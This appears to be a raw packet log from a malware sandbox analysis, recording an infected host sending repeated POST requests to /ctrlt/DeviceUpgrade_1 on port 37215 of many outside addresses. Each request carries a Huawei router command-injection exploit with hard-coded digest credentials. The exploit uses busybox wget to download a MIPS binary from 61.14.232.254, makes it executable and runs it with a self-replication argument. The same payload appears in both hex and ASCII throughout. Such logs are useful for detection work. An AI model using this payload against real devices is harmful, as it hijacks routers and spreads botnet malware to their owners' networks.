3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1626192.168.2.1338440222.176.12.22937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.593578100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1627192.168.2.1357638157.19.198.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.593597889 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1628192.168.2.134291241.196.213.17237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.593605042 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1629192.168.2.1360840157.127.185.23437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.593637943 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1630192.168.2.1353858157.210.18.037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.593642950 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1631192.168.2.135232641.121.62.19837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.593739033 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1632192.168.2.135470441.124.150.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.593739033 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1633192.168.2.1360344218.139.171.7437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.596715927 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1634192.168.2.1357080100.34.84.10537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.596749067 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1635192.168.2.135450641.13.227.3637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.596771955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1636192.168.2.135829241.104.182.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:20.596777916 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
